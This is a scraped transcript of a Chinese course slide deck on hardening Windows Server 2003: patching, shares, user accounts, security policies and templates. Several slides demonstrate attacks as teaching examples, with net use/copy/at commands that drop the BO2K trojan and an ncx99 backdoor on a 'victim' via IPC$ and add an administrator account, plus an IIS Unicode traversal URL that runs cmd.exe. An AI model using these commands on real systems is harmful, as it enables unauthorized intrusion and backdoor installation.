1 / 103

搭建安全操作系统- Windows2003 安全配置

学习情景 3. 搭建安全操作系统- Windows2003 安全配置. 陈晓红. www.xjqg.edu.cn. 学习任务. 任务 3 - 1 :系统漏洞与漏洞修补. 任务 3 - 2 :用户账户安全配置. 任务 3 - 3 : Windows2003 安全策略. 任务 3 - 4 :使用 IPSec 加强系统安全性. 任务 3 - 5 : Windows2003 的 NTFS 特性. 任务 3 - 6 : 利用注册表增加系统安全性. 任务 3 - 7 : Windows2003 日志管理. 任务 3 - 1 :系统漏洞与漏洞修补. 学习目标 :

greg
Download Presentation

搭建安全操作系统- Windows2003 安全配置

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. 学习情景3 搭建安全操作系统- Windows2003 安全配置 陈晓红 www.xjqg.edu.cn

  2. 学习任务 任务3-1:系统漏洞与漏洞修补 任务3-2:用户账户安全配置 任务3-3:Windows2003安全策略 任务3-4:使用IPSec加强系统安全性 任务3-5: Windows2003的NTFS特性 任务3-6: 利用注册表增加系统安全性 任务3-7: Windows2003日志管理

  3. 任务3-1:系统漏洞与漏洞修补 • 学习目标: • 了解操作系统安全概念 • 了解计算机操作系统安全评估 • 知道系统漏洞,能够修补漏洞 • 学习内容 : • 操作系统安全概念 • 计算机操作系统安全评估标准 • 系统漏洞 • 漏洞修补

  4. 操作系统安全概念 • 一般意义上,如果说一个计算机系统是安全的,那么是指该系统能够控制外部对系统信息的访问。也就是说,只有经过授权的用户或代表该用户运行的进程才能读、写、创建或删除信息。

  5. 计算机操作系统安全评估标准 • 美国可信计算机安全评估标准(TCSEC),是计算机系统安全评估的第一个正式标准。----- “桔皮书”标准 • TCSEC将计算机系统的安全划分为4个等级、7个级别。 (1)D级 (2)C级:C1级,C2级 (3)B级:B1,B2,B3 (4)A级

  6. 校验级保护,并提供B3级安全手段 A 级 安全域,数据隐藏与分层、屏蔽 B3 级 结构化内容保护,支持硬件保护 B2 级 标记安全保护,如System V等 B1 级 有自主的访问安全性,区分用户 C2 级 不区分用户,基本的访问控制 C1 级 没有安全性可言,例如MS DOS D 级 操作系统安全级别

  7. 操作系统安全级别

  8. 国内的安全操作系统评估 • 《计算机信息安全保护等级划分准则》将计算机信息系统安全保护等级划分为五个级别: 1、用户自主保护级 2、系统审计保护级 3、安全标记保护级 4、结构化保护级 5、安全域级保护级

  9. 系统漏洞 • 不安全服务 • Remote Registry Service • Messenger • 默认共享 • 查看默认共享:net share • 关闭默认共享:net share c$ /del 允许远程注册表操作 (禁止) 信使服务

  10. IPC共享问题 什么IPC?(Internet Process Connection) IPC$空会话连接!! 管理共享(C$、d$、Admin$)!!

  11. IPC攻击演示 E:\>net use \\victim\ipc$ “” /user:”” E:\>net view \\victim 结果:获得victim主机共享资源列表 Continue…… E:\>net use y: \\victim\share “xxx” /user:”xxxx” 结果:victim主机的share目录被映射为Y盘

  12. IPC攻击演示 Now,I can cortrol you E:\>net use \\victim\IPC$ “xx” /user:”xxx” E:\>copy bo2K.exe \\victim\ADMIN$ E:\>at \\victim time c:\winnt\bo2k.exe

  13. IPC攻击演示 E:\>copy ncx99.exe \\victim\ADMIN$ E:\>at \\victim 10:10 c:\winnt\ncx99 E:\>telnet victim 99 net user guest guest /add net localgroup Administrators guest /add ………………...

  14. IPC问题的解决 • 注册表修改 • 取消为管理而设的共享 • 限制IPC空会话连接 • 软件防火墙 • 禁止来自Internet的NetBios访问

  15. 系统漏洞 • 系统漏洞扫描助手(演示)

  16. Windows 典型系统漏洞介绍 • 输入法漏洞 • MIME头漏洞 • Unicode漏洞 • 缓存溢出漏洞 • ……

  17. 输入法漏洞 演示

  18. MIME邮件头漏洞 • MIME简介MIME(Multipurpose Internet Mail Extentions),一般译作“多用途的网络邮件扩充协议”。顾名思义,它可以传送多媒体文件,在一封电子邮件中附加各种格式文件一起送出。

  19. 攻击者可以创建一个Html格式的E-mail,该E-mail的附件为可执行文件,通过修改MIME头,使IE不能正确处理这个MIME所指定的可执行文件附件。攻击者可以创建一个Html格式的E-mail,该E-mail的附件为可执行文件,通过修改MIME头,使IE不能正确处理这个MIME所指定的可执行文件附件。 • IE是如何处理附件的:一般情况下如果附件是文本文件,IE会读它,如果是VIDEO CLIP,IE会查看它;如果附件是图形文件,IE就会显示它;如果附件是一个EXE文件呢?IE会提示用户是否执行!但当攻击者更改MIME类型后,IE就不再提示用户是否执行而直接运行该附件!从而使攻击者加在附件中的程序、攻击命令能够按照攻击者设想的情况进行。

  20. MIME邮件头漏洞 Content-type语句,用来指明传递的就是MIME类型的文件。 Content-Type: audio/x-wav; name=“test.exe" Content-Transfer-Encoding: base64 Content-ID: <THE-CID> Oh,why? internet It’s for you

  21. Unicode漏洞 • 微软IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安全漏洞,导致用户可以远程通过IIS执行任意命令 • 当IIS打开文件时,如果该文件名包含unicode字符,它会对其进行解码,如果用户提供一些特殊的编码,将导致IIS错误的打开或者执行某些web根目录以外的文件 • http://*.*.*.*/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir(Windows 2000漏洞编码)

  22. Unicode漏洞补救方法 (1)限制网络用户访问和调用CMD命令的权限 (2)若没必要使用SCRIPTS和MSADC目录,删除或改名; (3)安装Windows 系统时不要使用默认WINNT路径,可以改为其他的文件夹; (4) 下载Microsoft提供的补丁

  23. 系统漏洞修补 • 删除不必要的共享 • Windows Update • 360安全卫士(演示)

  24. 实验: • 实验3-1:在Windows 2003中关闭默认共享 • 实验3-2:隐藏用户账户 • 实验3-3: Windows 2003登录事件审核

  25. 任务3-2:用户账户安全配置 • 学习目标: • 了解用户账户的类型 • 掌握用户账户安全设置 • 学习内容 : • 什么是用户账户? • 用户账户的类型 • 本地用户账户安全设置

  26. 一、什么是用户账户? • 存在于Windows 2000、Windows xp、Windows2003中 • 系统中的一种对象 • 包含多种属性,如用户名、密码等 • 不同用户账户的配置环境不同 • 不同用户账户的用户名和密码不同 • 不同用户账户的SID不同

  27. SID是什么? • SID(安全标识符)是标识一个注册用户的惟一名字,它可用来标识一个用户或一组用户。 • SID由一串英文字母和数字组成的字符串。 • SID是在创建用户时,有系统根据当前的状态随即生成。

  28. 二、用户账户的类型 • 本地用户账户 • 使用“本地用户和组” 创建 • 存储在SAM数据库中 • 登录时进行本地身份验证 • 域用户账户 • 使用“AD用户和计算机” 创建 • 存储在AD数据库中 • 登录时进行网络身份验证

  29. SAM是什么? • SAM (Security Account Manager,安全账号管理器) • 安全账号管理器维护安全账号管理数据库,即SAM数据库。 • 存在于:C:\WINDOWS\system32\config • 负责本地身份认证

  30. 用户账户的创建 • 本地用户账户: • 本地用户和组-lusermgr.msc • Net user • 脚本 • 域用户帐户: • AD用户和计算机-dsa.msc • User add • 脚本

  31. 有关本地用户账户的讨论 • 一部分信息存储在注册表中 • 克隆用户账户 • 提升用户账户权限 • 隐藏用户账户

  32. 用户账户的密码 • 最长127个字符 • 存储在SAM数据库中获AD中 • 默认较弱的加密方法 • 空密码的问题 • 密码策略

  33. 三、本地用户账户安全设置 1.停用Guest用户把Guest账号禁用,并且修改Guest账号的属性,设置拒绝远程访问。

  34. 2.系统Administrator账号改名 防止管理员账号密码被穷举,伪装成普通用户。

  35. 3.创建一个陷阱用户 将管理员账号权限设置最低,延缓攻击企图。

  36. 4.不显示上次登录用户名 防止密码猜测,打开注册表编辑器并找到注册表项“HKEY_CURRENT\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Dont-DisplayLastUserName”,把REG_SZ的键值改成1。

  37. 5.开启用户策略 可以有效的防止字典式攻击。 • 当某一用户连续5次录都失败后将自动锁定该账户,30分钟后自动复位被锁定的账户。

  38. 6.隐藏用户账户 防止黑客显示系统用户账户,穷举密码。 本地用户账户的信息不仅仅存放在SAM中,还有一部分存放在注册表 演示 相关实验:隐藏用户账户

  39. 实验: • 实验3-2:隐藏用户账户

  40. 任务3-3:Windows2003 安全策略 • 学习目标: • 了解安全策略和安全模板 • 了解安全配置和分析工具 • 掌握安全模板的使用 • 掌握安全配置和分析工具的使用 • 学习内容 : • 一、什么是安全策略 • 二、安全模板 • 三、安全配置和分析 • 四、与安全配置和分析相关的命令

  41. 一、什么是安全策略 安全策略是指在一个特定的环境里,为保证提供 一定级别的安全保护所必须遵守的规则。

  42. 本地安全策略简介 演示 相关实验:Windows 2003登录事件审核

  43. 权利和权限

  44. 二、安全模板 什么是安全模版? • 系统预制好的安全策略的设置,不同的安全模版有不同的定制

  45. 安全模板可用于定义: • 帐户策略 • 密码策略 • 帐户锁定策略 • Kerberos 策略 • 本地策略 • 审核策略 • 用户权限分配 • 安全选项 • 事件日志:应用程序、系统和安全的事件日志设置 • 受限制的组:安全敏感组的成员资格 • 系统服务:系统服务的启动和权限 • 注册表:注册表项的权限 • 文件系统:文件夹和文件的权限

  46. 演示 打开安全模版 默认安全模版:开始-程序-运行-mmc-添加安全模版 在不同的安全模版当中内置不同的安全级别

  47. 修改模版

  48. 添加新的模版

  49. 安全模版的应用 • 域:导入GPO.通过配置域或部门的安全性来简化域管理 • 本地:导入本地安全策略。 • 方法一:本地安全策略-右键“安全设置”-导入模版 • 方法二:使用“安全配置和分析”工具 • 方法三:Secedit 命令行工具

  50. 三、安全配置和分析

More Related